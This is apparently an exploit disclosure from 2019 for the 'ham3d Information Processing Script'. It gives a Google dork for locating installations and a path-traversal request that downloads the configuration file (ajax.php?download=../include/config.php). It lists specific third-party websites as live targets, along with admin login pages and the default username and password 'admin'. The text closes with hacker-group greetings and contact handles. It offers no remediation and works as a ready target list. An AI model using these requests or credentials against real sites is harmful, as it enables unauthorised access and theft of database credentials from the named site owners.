/*********************************************************************************** ** Exploit Title: ham3d Information Processing Script Local File Download & Default Password Vulnerability ** ** Exploit Author: Milad Hacking ** ** Vendor Homepage : http://www.ham3d.net/ ** ** Demo Script Link: http://wensoni.com ** ** Version : 1.1 ** ** Google Dork : inurl:fa/forgotpass.html ** ** Date: 2019-10-25 ** ** Tested on: Kali Linux / lceweasel ** *********************************************************************************** ** Demo : http://123cookie.ir/ajax.php?download=../include/config.php http://1q1.ir/ajax.php?download=../include/config.php http://emitice.ir/ajax.php?download=../include/config.php http://wensoni.com/ajax.php?download=../include/config.php http://tiamnetworks.ir/ajax.php?download=../include/config.php http://assc.ir/ajax.php?download=../include/config.php User * Password With Login : admin http://www.5040.ir/report/admin/ http://www.shoaco.com/admin951shoaco/index.php?login http://quran.kish.ir/admin159357kishetrat2486/?login http://setareganzamin.com/ADMIN123654789SETAREGANEZAMIN/index.php?login http://assc.ir/admin/?forgot_password#?login *********************************************************************************** ** Special thanks to: iliya Norton - Milad Hacking - N3TC4T - Nazila Blackhat - Mahsa Black - Azinista Mahdi Cocain - Vahid Elmi Long Love Ashiyane <3 *********************************************************************************** https://tlgm.me/Milad_Hacking http://instagram.com/Milad.Hacking milad.hacking.blackhat@Gmail.com ***********************************************************************************